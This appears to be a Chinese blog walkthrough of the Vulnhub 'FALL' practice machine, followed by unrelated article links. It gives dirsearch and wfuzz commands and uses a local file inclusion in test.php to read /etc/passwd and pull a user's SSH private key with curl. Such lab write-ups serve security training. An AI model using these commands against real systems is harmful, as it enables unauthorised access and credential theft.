当前位置: 首页 > article >正文

Vulhub靶机--FAll

1.靶机下载地址

https://download.vulnhub.com/digitalworld/FALL.7z

这里可以看到ip和部分端口,我们还是扫描一下查看

2.扫描靶机和kali ip

kali

靶机

3.访问靶机80端口

4.敏感目录扫描

dirsearch -u "http://192.168.195.135"  

5.依次打开文件查看

发现/test.php中缺少get参数

6.使用kali自带的字典,爆破查询参数

wfuzz -u "http://192.168.195.135/test.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/big.txt --hh 80
 

7.查看文件/etc/password

8.查看qiu的 ssh 密钥:

http://192.168.195.135/test.php?file=/home/qiu/.ssh/id_rsa

9.在kali内将私钥文件页面内容下载下来

 curl http://192.168.195.135/test.php?file=/home/qiu/.ssh/id_rsa > id_rsa

10.提升文件权限,私钥连接

11.提权

查看历史文件知道用户密码


http://www.kler.cn/a/611682.html

相关文章:

  • 数据湖的崛起:从大数据到智能未来的钥匙
  • CMake入门及生成windows下的项目示例讲解
  • Postman 请求头详解:快速掌握
  • flutter 获取设备的唯一标识
  • 国产 FPGA 的崛起之路,能否打破 Xilinx 的垄断?
  • nodejs-原型污染链
  • 基于核选择融合注意力机制TCN-MTLATTENTION-MAMBA模型(Python\matlab代码)
  • 【点盾云】加密技术如何防止视频内容随意传播?
  • Windows卸载以压缩包形式安装的MySQL
  • qt+opengl 加载三维obj文件
  • 跨网段投屏(by quqi99)
  • STM32编写触摸按键
  • 安全工具膨胀的隐性成本及其解决方法
  • 使用string和string_view(二)——数值转换、std::string_view和非标准字符串
  • Flutter常用功能教程:新手入门指南
  • 【读论文】——基于高光谱的玉米籽粒黄曲霉侵染方法研究
  • 性能测试理论基础-性能指标及jmeter中的指标
  • 车载充气泵pcba设计方案研发
  • 学习Vue-router的使用
  • 【Python实用技巧】OS模块详解:文件与目录操作的瑞士军刀